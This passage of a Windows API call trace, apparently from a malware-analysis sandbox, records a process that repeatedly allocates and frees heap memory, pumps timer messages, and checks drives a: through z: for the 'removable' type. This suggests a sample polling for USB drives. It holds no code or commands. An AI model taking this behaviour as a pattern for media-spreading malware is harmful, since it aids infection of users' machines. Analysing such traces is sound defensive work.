GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.110] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.110] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.110] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.111] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.111] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.111] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.111] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.111] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0215.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0215.112] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.112] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.113] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.113] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0215.113] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0215.113] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0215.113] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.113] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.113] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.114] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.114] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.114] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.114] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.114] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.114] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.115] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.115] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.115] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.115] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.115] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.115] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.116] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.117] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.117] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.117] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.117] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.117] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.118] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.118] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.122] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.122] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.123] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.123] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.123] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.124] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.124] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.124] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.125] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.125] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.125] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.125] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.125] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.126] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.126] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.126] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0215.126] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0215.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.126] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0215.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.127] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.127] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.127] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.127] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.127] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.127] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.128] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.128] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.128] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.128] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.128] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.129] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.129] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.129] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.129] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.129] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.130] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.131] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.131] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.131] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.132] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.133] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.133] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326080 [0215.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326080 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0215.134] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0215.134] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.134] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.135] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0215.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.135] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.135] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.138] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: 